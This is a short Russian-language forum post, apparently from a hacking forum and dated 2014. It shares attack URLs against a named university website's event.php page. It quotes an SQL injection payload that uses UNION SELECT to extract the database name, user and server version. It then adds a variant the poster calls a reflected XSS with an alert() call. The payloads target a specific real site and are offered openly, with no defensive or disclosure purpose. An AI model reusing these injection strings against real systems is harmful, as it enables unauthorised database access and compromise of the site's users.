Показать сообщение отдельно

  #9  
Старый 08.04.2014, 12:50
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию

Цитата:
Сообщение от unic0rn  
Код:
http://mfc.edu/event.php?id=-16%27+UNION+SELECT+1,concat_ws%280x3e3e,database%28%29,user%28%29%29,3,version%28%29,5,6,7,8+--+
DEPARTMENT OF FINANCIAL STUDIES UNIVERSITY OF DELHI, PR4
Может кому интересно будет, тут присутствует еще одна уязвимость - отраженная XSS:

Цитата:
Сообщение от None  
mfc.edu/event.php?id=-8' union select 1,concat_ws(0x3a,database
%2528
),user()),3,version(),5,6,7,8--
alert(/Antichat/)
 
Ответить с цитированием